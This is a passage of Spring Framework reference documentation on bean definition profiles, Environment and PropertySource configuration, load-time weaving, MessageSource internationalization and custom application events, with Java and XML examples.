username;\n\n\t\t@Value(\"${jdbc.password}\")\n\t\tprivate String password;\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new DriverManagerDataSource(url, username, password);\n\t\t}\n\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tproperties-config.xml\n\t<beans>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\t<\/beans>\n----\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.properties\njdbc.url=jdbc:hsqldb:hsql:\/\/localhost\/xdb\njdbc.username=sa\njdbc.password=\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(AppConfig.class);\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\t\/\/ ...\n\t}\n----\n\n[[beans-environment]]\n== Environment abstraction\n\nThe {api-spring-framework}\/core\/env\/Environment.html[`Environment`]\nis an abstraction integrated in the container that models two key\naspects of the application environment: <<beans-definition-profiles,_profiles_>>\nand <<beans-property-source-abstraction,_properties_>>.\n\nA _profile_ is a named, logical group of bean definitions to be registered with the\ncontainer only if the given profile is active. Beans may be assigned to a profile\nwhether defined in XML or via annotations. The role of the `Environment` object with\nrelation to profiles is in determining which profiles (if any) are currently active,\nand which profiles (if any) should be active by default.\n\nProperties play an important role in almost all applications, and may originate from\na variety of sources: properties files, JVM system properties, system environment\nvariables, JNDI, servlet context parameters, ad-hoc Properties objects, Maps, and so\non. The role of the `Environment` object with relation to properties is to provide the\nuser with a convenient service interface for configuring property sources and resolving\nproperties from them.\n\n[[beans-definition-profiles]]\n=== Bean definition profiles\n\nBean definition profiles is a mechanism in the core container that allows for\nregistration of different beans in different environments. The word _environment_\ncan mean different things to different users and this feature can help with many\nuse cases, including:\n\n* working against an in-memory datasource in development vs looking up that same\ndatasource from JNDI when in QA or production\n* registering monitoring infrastructure only when deploying an application into a\nperformance environment\n* registering customized implementations of beans for customer A vs. customer\nB deployments\n\nLet's consider the first use case in a practical application that requires a\n`DataSource`. In a test environment, the configuration may look like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean\n\tpublic DataSource dataSource() {\n\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t.addScript(\"my-schema.sql\")\n\t\t\t.addScript(\"my-test-data.sql\")\n\t\t\t.build();\n\t}\n----\n\nLet's now consider how this application will be deployed into a QA or production\nenvironment, assuming that the datasource for the application will be registered\nwith the production application server's JNDI directory. Our `dataSource` bean\nnow looks like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\tpublic DataSource dataSource() throws Exception {\n\t\tContext ctx = new InitialContext();\n\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t}\n----\n\nThe problem is how to switch between using these two variations based on the\ncurrent environment. Over time, Spring users have devised a number of ways to\nget this done, usually relying on a combination of system environment variables\nand XML `<import\/>` statements containing `${placeholder}` tokens that resolve\nto the correct configuration file path depending on the value of an environment\nvariable. Bean definition profiles is a core container feature that provides a\nsolution to this problem.\n\nIf we generalize the example use case above of environment-specific bean\ndefinitions, we end up with the need to register certain bean definitions in\ncertain contexts, while not in others. You could say that you want to register a\ncertain profile of bean definitions in situation A, and a different profile in\nsituation B. Let's first see how we can update our configuration to reflect\nthis need.\n\n[[beans-definition-profiles-java]]\n==== @Profile\n\nThe {api-spring-framework}\/context\/annotation\/Profile.html[`@Profile`]\nannotation allows you to indicate that a component is eligible for registration\nwhen one or more specified profiles are active. Using our example above, we\ncan rewrite the `dataSource` configuration as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"dev\")**\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"production\")**\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[NOTE]\n====\nAs mentioned before, with `@Bean` methods, you will typically choose to use programmatic\nJNDI lookups: either using Spring's `JndiTemplate`\/`JndiLocatorDelegate` helpers or the\nstraight JNDI `InitialContext` usage shown above, but not the `JndiObjectFactoryBean`\nvariant which would force you to declare the return type as the `FactoryBean` type.\n====\n\n`@Profile` can be used as a <<beans-meta-annotations,meta-annotation>> for the purpose\nof creating a custom _composed annotation_. The following example defines a custom\n`@Production` annotation that can be used as a drop-in replacement for\n`@Profile(\"production\")`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t**@Profile(\"production\")**\n\tpublic @interface Production {\n\t}\n----\n\n`@Profile` can also be declared at the method level to include only one particular bean\nof a configuration class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\t**@Profile(\"dev\")**\n\t\tpublic DataSource devDataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\n\t\t@Bean\n\t\t**@Profile(\"production\")**\n\t\tpublic DataSource productionDataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[TIP]\n====\nIf a `@Configuration` class is marked with `@Profile`, all of the `@Bean` methods and\n`@Import` annotations associated with that class will be bypassed unless one or more of\nthe specified profiles are active. If a `@Component` or `@Configuration` class is marked\nwith `@Profile({\"p1\", \"p2\"})`, that class will not be registered\/processed unless\nprofiles 'p1' and\/or 'p2' have been activated. If a given profile is prefixed with the\nNOT operator (`!`), the annotated element will be registered if the profile is **not**\nactive. For example, given `@Profile({\"p1\", \"!p2\"})`, registration will occur if profile\n'p1' is active or if profile 'p2' is not active.\n====\n\n[[beans-definition-profiles-xml]]\n=== XML bean definition profiles\n\nThe XML counterpart is the `profile` attribute of the `<beans>` element. Our sample\nconfiguration above can be rewritten in two XML files as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans profile=\"dev\"\n\t\txmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t<\/jdbc:embedded-database>\n\t<\/beans>\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans profile=\"production\"\n\t\txmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t<\/beans>\n----\n\nIt is also possible to avoid that split and nest `<beans\/>` elements within the same file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<!-- other bean definitions -->\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\t<\/beans>\n----\n\nThe `spring-bean.xsd` has been constrained to allow such elements only as the\nlast ones in the file. This should help provide flexibility without incurring\nclutter in the XML files.\n\n[[beans-definition-profiles-enable]]\n==== Activating a profile\n\nNow that we have updated our configuration, we still need to instruct Spring which\nprofile is active. If we started our sample application right now, we would see\na `NoSuchBeanDefinitionException` thrown, because the container could not find\nthe Spring bean named `dataSource`.\n\nActivating a profile can be done in several ways, but the most straightforward is to do\nit programmatically against the `Environment` API which is available via an\n`ApplicationContext`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\tctx.getEnvironment().setActiveProfiles(\"dev\");\n\tctx.register(SomeConfig.class, StandaloneDataConfig.class, JndiDataConfig.class);\n\tctx.refresh();\n----\n\nIn addition, profiles may also be activated declaratively through the\n`spring.profiles.active` property which may be specified through system environment\nvariables, JVM system properties, servlet context parameters in `web.xml`, or even as an\nentry in JNDI (see <<beans-property-source-abstraction>>). In integration tests, active\nprofiles can be declared via the `@ActiveProfiles` annotation in the `spring-test` module\n(see <<testcontext-ctx-management-env-profiles>>).\n\nNote that profiles are not an \"either-or\" proposition; it is possible to activate multiple\nprofiles at once. Programmatically, simply provide multiple profile names to the\n`setActiveProfiles()` method, which accepts `String...` varargs:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tctx.getEnvironment().setActiveProfiles(\"profile1\", \"profile2\");\n----\n\nDeclaratively, `spring.profiles.active` may accept a comma-separated list of profile names:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t-Dspring.profiles.active=\"profile1,profile2\"\n----\n\n[[beans-definition-profiles-default]]\n==== Default profile\n\nThe _default_ profile represents the profile that is enabled by default. Consider the\nfollowing:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"default\")**\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\nIf no profile is active, the `dataSource` above will be created; this can be\nseen as a way to provide a _default_ definition for one or more beans. If any\nprofile is enabled, the _default_ profile will not apply.\n\nThe name of the default profile can be changed using `setDefaultProfiles()` on\nthe `Environment` or declaratively using the `spring.profiles.default` property.\n\n[[beans-property-source-abstraction]]\n=== PropertySource abstraction\n\nSpring's `Environment` abstraction provides search operations over a configurable\nhierarchy of property sources. To explain fully, consider the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nApplicationContext ctx = new GenericApplicationContext();\nEnvironment env = ctx.getEnvironment();\nboolean containsFoo = env.containsProperty(\"foo\");\nSystem.out.println(\"Does my environment contain the 'foo' property? \" + containsFoo);\n----\n\nIn the snippet above, we see a high-level way of asking Spring whether the `foo` property is\ndefined for the current environment. To answer this question, the `Environment` object performs\na search over a set of {api-spring-framework}\/core\/env\/PropertySource.html[`PropertySource`]\nobjects. A `PropertySource` is a simple abstraction over any source of key-value pairs, and\nSpring's {api-spring-framework}\/core\/env\/StandardEnvironment.html[`StandardEnvironment`]\nis configured with two PropertySource objects -- one representing the set of JVM system properties\n(_a la_ `System.getProperties()`) and one representing the set of system environment variables\n(_a la_ `System.getenv()`).\n\n[NOTE]\n====\nThese default property sources are present for `StandardEnvironment`, for use in standalone\napplications. {api-spring-framework}\/web\/context\/support\/StandardServletEnvironment.html[`StandardServletEnvironment`]\nis populated with additional default property sources including servlet config and servlet\ncontext parameters. It can optionally enable a {api-spring-framework}\/jndi\/JndiPropertySource.html[`JndiPropertySource`].\nSee the javadocs for details.\n====\n\nConcretely, when using the `StandardEnvironment`, the call to `env.containsProperty(\"foo\")`\nwill return true if a `foo` system property or `foo` environment variable is present at\nruntime.\n\n[TIP]\n====\nThe search performed is hierarchical. By default, system properties have precedence over\nenvironment variables, so if the `foo` property happens to be set in both places during\na call to `env.getProperty(\"foo\")`, the system property value will 'win' and be returned\npreferentially over the environment variable. Note that property values will not get merged\nbut rather completely overridden by a preceding entry.\n\nFor a common `StandardServletEnvironment`, the full hierarchy looks as follows, with the\nhighest-precedence entries at the top:\n\n* ServletConfig parameters (if applicable, e.g. in case of a `DispatcherServlet` context)\n* ServletContext parameters (web.xml context-param entries)\n* JNDI environment variables (\"java:comp\/env\/\" entries)\n* JVM system properties (\"-D\" command-line arguments)\n* JVM system environment (operating system environment variables)\n====\n\nMost importantly, the entire mechanism is configurable. Perhaps you have a custom source\nof properties that you'd like to integrate into this search. No problem -- simply implement\nand instantiate your own `PropertySource` and add it to the set of `PropertySources` for the\ncurrent `Environment`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nConfigurableApplicationContext ctx = new GenericApplicationContext();\nMutablePropertySources sources = ctx.getEnvironment().getPropertySources();\nsources.addFirst(new MyPropertySource());\n----\n\nIn the code above, `MyPropertySource` has been added with highest precedence in the\nsearch. If it contains a `foo` property, it will be detected and returned ahead of\nany `foo` property in any other `PropertySource`. The\n{api-spring-framework}\/core\/env\/MutablePropertySources.html[`MutablePropertySources`]\nAPI exposes a number of methods that allow for precise manipulation of the set of\nproperty sources.\n\n=== @PropertySource\n\nThe {api-spring-framework}\/context\/annotation\/PropertySource.html[`@PropertySource`]\nannotation provides a convenient and declarative mechanism for adding a `PropertySource`\nto Spring's `Environment`.\n\nGiven a file \"app.properties\" containing the key\/value pair `testbean.name=myTestBean`,\nthe following `@Configuration` class uses `@PropertySource` in such a way that\na call to `testBean.getName()` will return \"myTestBean\".\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n @Configuration\n **@PropertySource(\"classpath:\/com\/myco\/app.properties\")**\n public class AppConfig {\n\t @Autowired\n\t Environment env;\n\n\t @Bean\n\t public TestBean testBean() {\n\t\t TestBean testBean = new TestBean();\n\t\t testBean.setName(env.getProperty(\"testbean.name\"));\n\t\t return testBean;\n\t }\n }\n----\n\nAny `${...}` placeholders present in a `@PropertySource` resource location will\nbe resolved against the set of property sources already registered against the\nenvironment. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n @Configuration\n @PropertySource(\"classpath:\/com\/${my.placeholder:default\/path}\/app.properties\")\n public class AppConfig {\n\t @Autowired\n\t Environment env;\n\n\t @Bean\n\t public TestBean testBean() {\n\t\t TestBean testBean = new TestBean();\n\t\t testBean.setName(env.getProperty(\"testbean.name\"));\n\t\t return testBean;\n\t }\n }\n----\n\nAssuming that \"my.placeholder\" is present in one of the property sources already\nregistered, e.g. system properties or environment variables, the placeholder will\nbe resolved to the corresponding value. If not, then \"default\/path\" will be used\nas a default. If no default is specified and a property cannot be resolved, an\n`IllegalArgumentException` will be thrown.\n\n\n=== Placeholder resolution in statements\n\nHistorically, the value of placeholders in elements could be resolved only against\nJVM system properties or environment variables. No longer is this the case. Because\nthe Environment abstraction is integrated throughout the container, it's easy to\nroute resolution of placeholders through it. This means that you may configure the\nresolution process in any way you like: change the precedence of searching through\nsystem properties and environment variables, or remove them entirely; add your\nown property sources to the mix as appropriate.\n\nConcretely, the following statement works regardless of where the `customer`\nproperty is defined, as long as it is available in the `Environment`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<import resource=\"com\/bank\/service\/${customer}-config.xml\"\/>\n\t<\/beans>\n----\n\n\n[[context-load-time-weaver]]\n== Registering a LoadTimeWeaver\n\nThe `LoadTimeWeaver` is used by Spring to dynamically transform classes as they are\nloaded into the Java virtual machine (JVM).\n\nTo enable load-time weaving add the `@EnableLoadTimeWeaving` to one of your\n`@Configuration` classes:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@EnableLoadTimeWeaving\n\tpublic class AppConfig {\n\n\t}\n----\n\nAlternatively for XML configuration use the `context:load-time-weaver` element:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:load-time-weaver\/>\n\t<\/beans>\n----\n\nOnce configured for the `ApplicationContext`. Any bean within that `ApplicationContext`\nmay implement `LoadTimeWeaverAware`, thereby receiving a reference to the load-time\nweaver instance. This is particularly useful in combination with <<orm-jpa,Spring's JPA\nsupport>> where load-time weaving may be necessary for JPA class transformation. Consult\nthe `LocalContainerEntityManagerFactoryBean` javadocs for more detail. For more on\nAspectJ load-time weaving, see <<aop-aj-ltw>>.\n\n\n\n\n[[context-introduction]]\n== Additional Capabilities of the ApplicationContext\n\nAs was discussed in the chapter introduction, the `org.springframework.beans.factory`\npackage provides basic functionality for managing and manipulating beans, including in a\nprogrammatic way. The `org.springframework.context` package adds the\n{api-spring-framework}\/context\/ApplicationContext.html[`ApplicationContext`]\ninterface, which extends the `BeanFactory` interface, in addition to extending other\ninterfaces to provide additional functionality in a more __application\nframework-oriented style__. Many people use the `ApplicationContext` in a completely\ndeclarative fashion, not even creating it programmatically, but instead relying on\nsupport classes such as `ContextLoader` to automatically instantiate an\n`ApplicationContext` as part of the normal startup process of a Java EE web application.\n\nTo enhance `BeanFactory` functionality in a more framework-oriented style the context\npackage also provides the following functionality:\n\n* __Access to messages in i18n-style__, through the `MessageSource` interface.\n* __Access to resources__, such as URLs and files, through the `ResourceLoader` interface.\n* __Event publication__ to namely beans implementing the `ApplicationListener` interface,\n through the use of the `ApplicationEventPublisher` interface.\n* __Loading of multiple (hierarchical) contexts__, allowing each to be focused on one\n particular layer, such as the web layer of an application, through the\n `HierarchicalBeanFactory` interface.\n\n\n\n[[context-functionality-messagesource]]\n=== Internationalization using MessageSource\n\nThe `ApplicationContext` interface extends an interface called `MessageSource`, and\ntherefore provides internationalization (i18n) functionality. Spring also provides the\ninterface `HierarchicalMessageSource`, which can resolve messages hierarchically.\nTogether these interfaces provide the foundation upon which Spring effects message\nresolution. The methods defined on these interfaces include:\n\n* `String getMessage(String code, Object[] args, String default, Locale loc)`: The basic\n method used to retrieve a message from the `MessageSource`. When no message is found\n for the specified locale, the default message is used. Any arguments passed in become\n replacement values, using the `MessageFormat` functionality provided by the standard\n library.\n* `String getMessage(String code, Object[] args, Locale loc)`: Essentially the same as\n the previous method, but with one difference: no default message can be specified; if\n the message cannot be found, a `NoSuchMessageException` is thrown.\n* `String getMessage(MessageSourceResolvable resolvable, Locale locale)`: All properties\n used in the preceding methods are also wrapped in a class named\n `MessageSourceResolvable`, which you can use with this method.\n\nWhen an `ApplicationContext` is loaded, it automatically searches for a `MessageSource`\nbean defined in the context. The bean must have the name `messageSource`. If such a bean\nis found, all calls to the preceding methods are delegated to the message source. If no\nmessage source is found, the `ApplicationContext` attempts to find a parent containing a\nbean with the same name. If it does, it uses that bean as the `MessageSource`. If the\n`ApplicationContext` cannot find any source for messages, an empty\n`DelegatingMessageSource` is instantiated in order to be able to accept calls to the\nmethods defined above.\n\nSpring provides two `MessageSource` implementations, `ResourceBundleMessageSource` and\n`StaticMessageSource`. Both implement `HierarchicalMessageSource` in order to do nested\nmessaging. The `StaticMessageSource` is rarely used but provides programmatic ways to\nadd messages to the source. The `ResourceBundleMessageSource` is shown in the following\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"messageSource\"\n\t\t\t\tclass=\"org.springframework.context.support.ResourceBundleMessageSource\">\n\t\t\t<property name=\"basenames\">\n\t\t\t\t<list>\n\t\t\t\t\t<value>format<\/value>\n\t\t\t\t\t<value>exceptions<\/value>\n\t\t\t\t\t<value>windows<\/value>\n\t\t\t\t<\/list>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nIn the example it is assumed you have three resource bundles defined in your classpath\ncalled `format`, `exceptions` and `windows`. Any request to resolve a message will be\nhandled in the JDK standard way of resolving messages through ResourceBundles. For the\npurposes of the example, assume the contents of two of the above resource bundle files\nare...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t# in format.properties\n\tmessage=Alligators rock!\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t# in exceptions.properties\n\targument.required=The {0} argument is required.\n----\n\nA program to execute the `MessageSource` functionality is shown in the next example.\nRemember that all `ApplicationContext` implementations are also `MessageSource`\nimplementations and so can be cast to the `MessageSource` interface.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tMessageSource resources = new ClassPathXmlApplicationContext(\"beans.xml\");\n\t\tString message = resources.getMessage(\"message\", null, \"Default\", null);\n\t\tSystem.out.println(message);\n\t}\n----\n\nThe resulting output from the above program will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nAlligators rock!\n----\n\nSo to summarize, the `MessageSource` is defined in a file called `beans.xml`, which\nexists at the root of your classpath. The `messageSource` bean definition refers to a\nnumber of resource bundles through its `basenames` property. The three files that are\npassed in the list to the `basenames` property exist as files at the root of your\nclasspath and are called `format.properties`, `exceptions.properties`, and\n`windows.properties` respectively.\n\nThe next example shows arguments passed to the message lookup; these arguments will be\nconverted into Strings and inserted into placeholders in the lookup message.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<!-- this MessageSource is being used in a web application -->\n\t\t<bean id=\"messageSource\" class=\"org.springframework.context.support.ResourceBundleMessageSource\">\n\t\t\t<property name=\"basename\" value=\"exceptions\"\/>\n\t\t<\/bean>\n\n\t\t<!-- lets inject the above MessageSource into this POJO -->\n\t\t<bean id=\"example\" class=\"com.foo.Example\">\n\t\t\t<property name=\"messages\" ref=\"messageSource\"\/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Example {\n\n\t\tprivate MessageSource messages;\n\n\t\tpublic void setMessages(MessageSource messages) {\n\t\t\tthis.messages = messages;\n\t\t}\n\n\t\tpublic void execute() {\n\t\t\tString message = this.messages.getMessage(\"argument.required\",\n\t\t\t\tnew Object [] {\"userDao\"}, \"Required\", null);\n\t\t\tSystem.out.println(message);\n\t\t}\n\n\t}\n----\n\nThe resulting output from the invocation of the `execute()` method will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nThe userDao argument is required.\n----\n\nWith regard to internationalization (i18n), Spring's various `MessageSource`\nimplementations follow the same locale resolution and fallback rules as the standard JDK\n`ResourceBundle`. In short, and continuing with the example `messageSource` defined\npreviously, if you want to resolve messages against the British (`en-GB`) locale, you\nwould create files called `format_en_GB.properties`, `exceptions_en_GB.properties`, and\n`windows_en_GB.properties` respectively.\n\nTypically, locale resolution is managed by the surrounding environment of the\napplication. In this example, the locale against which (British) messages will be\nresolved is specified manually.\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\n# in exceptions_en_GB.properties\nargument.required=Ebagum lad, the {0} argument is required, I say, required.\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(final String[] args) {\n\t\tMessageSource resources = new ClassPathXmlApplicationContext(\"beans.xml\");\n\t\tString message = resources.getMessage(\"argument.required\",\n\t\t\tnew Object [] {\"userDao\"}, \"Required\", Locale.UK);\n\t\tSystem.out.println(message);\n\t}\n----\n\nThe resulting output from the running of the above program will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nEbagum lad, the 'userDao' argument is required, I say, required.\n----\n\nYou can also use the `MessageSourceAware` interface to acquire a reference to any\n`MessageSource` that has been defined. Any bean that is defined in an\n`ApplicationContext` that implements the `MessageSourceAware` interface is injected with\nthe application context's `MessageSource` when the bean is created and configured.\n\n[NOTE]\n====\n__As an alternative to `ResourceBundleMessageSource`, Spring provides a\n`ReloadableResourceBundleMessageSource` class. This variant supports the same bundle\nfile format but is more flexible than the standard JDK based\n`ResourceBundleMessageSource` implementation.__ In particular, it allows for reading\nfiles from any Spring resource location (not just from the classpath) and supports hot\nreloading of bundle property files (while efficiently caching them in between). Check\nout the `ReloadableResourceBundleMessageSource` javadocs for details.\n====\n\n\n\n[[context-functionality-events]]\n=== Standard and Custom Events\n\nEvent handling in the `ApplicationContext` is provided through the `ApplicationEvent`\nclass and `ApplicationListener` interface. If a bean that implements the\n`ApplicationListener` interface is deployed into the context, every time an\n`ApplicationEvent` gets published to the `ApplicationContext`, that bean is notified.\nEssentially, this is the standard __Observer__ design pattern.\n\n[TIP]\n====\nAs of Spring 4.2, the event infrastructure has been significantly improved and offer\nan <<context-functionality-events-annotation,annotation-based model>> as well as the\nability to publish any arbitrary event, that is an object that does not necessarily\nextend from `ApplicationEvent`. When such an object is published we wrap it in an\nevent for you.\n====\n\nSpring provides the following standard events:\n\n[[beans-ctx-events-tbl]]\n.Built-in Events\n|===\n| Event| Explanation\n\n| `ContextRefreshedEvent`\n| Published when the `ApplicationContext` is initialized or refreshed, for example,\n using the `refresh()` method on the `ConfigurableApplicationContext` interface.\n \"Initialized\" here means that all beans are loaded, post-processor beans are detected\n and activated, singletons are pre-instantiated, and the `ApplicationContext` object is\n ready for use. As long as the context has not been closed, a refresh can be triggered\n multiple times, provided that the chosen `ApplicationContext` actually supports such\n \"hot\" refreshes. For example, `XmlWebApplicationContext` supports hot refreshes, but\n `GenericApplicationContext` does not.\n\n| `ContextStartedEvent`\n| Published when the `ApplicationContext` is started, using the `start()` method on the\n `ConfigurableApplicationContext` interface. \"Started\" here means that all `Lifecycle`\n beans receive an explicit start signal. Typically this signal is used to restart beans\n after an explicit stop, but it may also be used to start components that have not been\n configured for autostart , for example, components that have not already started on\n initialization.\n\n| `ContextStoppedEvent`\n| Published when the `ApplicationContext` is stopped, using the `stop()` method on the\n `ConfigurableApplicationContext` interface. \"Stopped\" here means that all `Lifecycle`\n beans receive an explicit stop signal. A stopped context may be restarted through a\n `start()` call.\n\n| `ContextClosedEvent`\n| Published when the `ApplicationContext` is closed, using the `close()` method on the\n `ConfigurableApplicationContext` interface. \"Closed\" here means that all singleton\n beans are destroyed. A closed context reaches its end of life; it cannot be refreshed\n or restarted.\n\n| `RequestHandledEvent`\n| A web-specific event telling all beans that an HTTP request has been serviced. This\n event is published __after__ the request is complete. This event is only applicable to\n web applications using Spring's `DispatcherServlet`.\n|===\n\nYou can also create and publish your own custom events. This example demonstrates a\nsimple class that extends Spring's `ApplicationEvent` base class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListEvent extends ApplicationEvent {\n\n\t\tprivate final String address;\n\t\tprivate final String test;\n\n\t\tpublic BlackListEvent(Object source, String address, String test) {\n\t\t\tsuper(source);\n\t\t\tthis.address = address;\n\t\t\tthis.test = test;\n\t\t}\n\n\t\t\/\/ accessor and other methods...\n\n\t}\n----\n\nTo publish a custom `ApplicationEvent`, call the `publishEvent()` method on an\n`ApplicationEventPublisher`. Typically this is done by creating a class that implements\n`ApplicationEventPublisherAware` and registering it as a Spring bean. The following\nexample demonstrates such a class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class EmailService implements ApplicationEventPublisherAware {\n\n\t\tprivate List<String> blackList;\n\t\tprivate ApplicationEventPublisher publisher;\n\n\t\tpublic void setBlackList(List<String> blackList) {\n\t\t\tthis.blackList = blackList;\n\t\t}\n\n\t\tpublic void setApplicationEventPublisher(ApplicationEventPublisher publisher) {\n\t\t\tthis.publisher = publisher;\n\t\t}\n\n\t\tpublic void sendEmail(String address, String text) {\n\t\t\tif (blackList.contains(address)) {\n\t\t\t\tBlackListEvent event = new BlackListEvent(this, address, text);\n\t\t\t\tpublisher.publishEvent(event);\n\t\t\t\treturn;\n\t\t\t}\n\t\t\t\/\/ send email...\n\t\t}\n\n\t}\n----\n\nAt configuration time, the Spring container will detect that `EmailService` implements\n`ApplicationEventPublisherAware` and will automatically call\n`setApplicationEventPublisher()`. In reality, the parameter passed in will be the Spring\ncontainer itself; you're simply interacting with the application context via its\n`ApplicationEventPublisher` interface.\n\nTo receive the custom `ApplicationEvent`, create a class that implements\n`ApplicationListener` and register it as a Spring bean. The following example\ndemonstrates such a 